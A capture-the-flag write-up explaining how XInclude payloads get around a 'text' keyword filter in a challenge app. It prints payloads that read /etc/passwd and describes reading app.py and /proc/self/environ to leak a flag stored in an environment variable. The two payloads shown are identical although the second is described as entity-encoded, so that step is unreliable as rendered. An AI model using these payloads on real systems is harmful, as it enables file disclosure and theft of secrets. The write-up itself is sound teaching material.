Rating: 5.0

The challenge provide the source code. We check code and found something interesting.
Line `ElementInclude.include(root)` and xml should not contain "text". Therefor we try using Xinclude to read file "app.py". The payload is:
```
<document xmlns:xi="http://www.w3.org/2001/XInclude">
<attribute>
Copyright (c) <xi:include href="/etc/passwd" parse="text"/>.
</attribute>
</document>
```
To bypass `if "text" not in xml.lower()`, we use HTML entity to encode "text" string. Replace "text" with `text`, we have:
```
<document xmlns:xi="http://www.w3.org/2001/XInclude">
<attribute>
Copyright (c) <xi:include href="/etc/passwd" parse="text"/>.
</attribute>
</document>
```
Submit payload and we can read file.
![/etc/passwd](https://i.ibb.co/9bcGZWL/1.png)

-----

Change "/etc/passwd" to "app.py" and know the flag is in environment variable.
![app.py](https://i.ibb.co/vjtMkF6/1.png)

-----

To have a flag we must read file "/proc/self/environ", modify the payload a bit, and...
![FLAG](https://i.ibb.co/rF2XGqH/1.png)

phamFeb. 14, 2022, 5:47 a.m.

good job